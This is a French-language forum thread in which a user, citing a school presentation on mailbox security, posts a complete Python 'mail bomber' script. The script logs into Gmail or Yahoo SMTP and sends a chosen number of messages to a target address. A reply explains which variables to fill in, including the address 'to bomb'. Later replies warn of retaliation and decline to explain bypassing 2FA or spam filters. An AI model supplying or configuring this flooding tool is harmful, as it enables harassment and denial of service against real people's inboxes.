[hacking] Mail bomber

[jereminfo07]

Bonjour, 

J'ai un exposer à réaliser qui traite de la sécurité, la vulnérabilité des boites mails. J'aurai aimé réaliser une démonstration via un script exécutable Python mais je ne comprend pas bien le script en question. J 'en ai trouvé plusieurs sur le net. 
Pouvez vous me dire les endroit ou je doit mettre les adresses mails, mot de passe, le smtp... 

voici celui que je trouve le plus compacte: 

 

#!/usr/bin/python

#pybombmail.py by aBi71

#This code for education purpose only.

#Use it at your own risk !!!

 

import os

import smtplib

import getpass

import sys

 

 

server = raw_input ('Server Mail: ')

user = raw_input('Username: ')

passwd = getpass.getpass('Password: ')

 

 

to = raw_input('\nTo: ')

#subject = raw_input('Subject: ')

body = raw_input('Message: ')

total = input('Number of send: ')

 

if server == 'gmail':

    smtp_server = 'smtp.gmail.com'

    port = 587

elif server == 'yahoo':

    smtp_server = 'smtp.mail.yahoo.com'

    port = 25

else:

    print 'Applies only to gmail and yahoo.'

    sys.exit()

 

print ''

 

try:

    server = smtplib.SMTP(smtp_server,port)

    server.ehlo()

    if smtp_server == "smtp.gmail.com":

            server.starttls()

    server.login(user,passwd)

    for i in range(1, total+1):

        subject = os.urandom(9)

        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body

        server.sendmail(user,to,msg)

        print "\rTotal emails sent: %i" % i

        sys.stdout.flush()

    server.quit()

    print '\n Done !!!'

except KeyboardInterrupt:

    print '[-] Canceled'

    sys.exit()

except smtplib.SMTPAuthenticationError:

    print '\n[!] The username or password you entered is incorrect.'

    sys.exit()

[Anon142]

Salut

Y-a des forums plus appropriés pour ça. Mais je vais être sympa.

Il faut remplir les variables

server = raw_input ('Server Mail: ') #Type de serveur

user = raw_input('Username: ') #Identifiant de co

passwd = getpass.getpass('Password: ') #Mdp de co

 

to = raw_input('\nTo: ') #adresse mail à bombarder

#subject = raw_input('Subject: ') #Retirer le dièze en début de ligne pour mettre un sujet non-random

body = raw_input('Message: ') #Corps du message

total = input('Number of send: ') #Nombre d'envoi par bombardement

Pour comprendre le script, il faut avoir les bases en python et savoir un peu comment fonctionne SMTP.

Ne compte pas sur moi pour t'expliquer comment bypass les sécu 2FA et anti-spamming de GMail ou de Yahoo. T'est pas au bon endroit.

Modifié le 18 janvier 2020 par Anon142

[Delta]

Il y a 5 heures, Anon142 a dit :

Ne compte pas sur moi pour t'expliquer comment bypass les sécu 2FA et anti-spamming de GMail ou de Yahoo. T'est pas au bon endroit.

et quand tu aura fait ton attaque.. Prie que la victime ne remontent pas jusqu'as toi ... Autrement dit, apprend aussi a bien te protégé..

si si, j'en connais qui ont jouer dans les attaque en tout genre et puis voir arriver 2 voitures non pas de police mais des mecs qui avait été attaqué, jte laisse devinez la suite

 

 

[jereminfo07]

merci les gars ! 
ou la non je ne vais rien attaqué du tout ! juste illustrer mes propos avec un simple exemple avec des boites mail bidons genre yopmail 

 

Modifié le 19 janvier 2020 par jereminfo07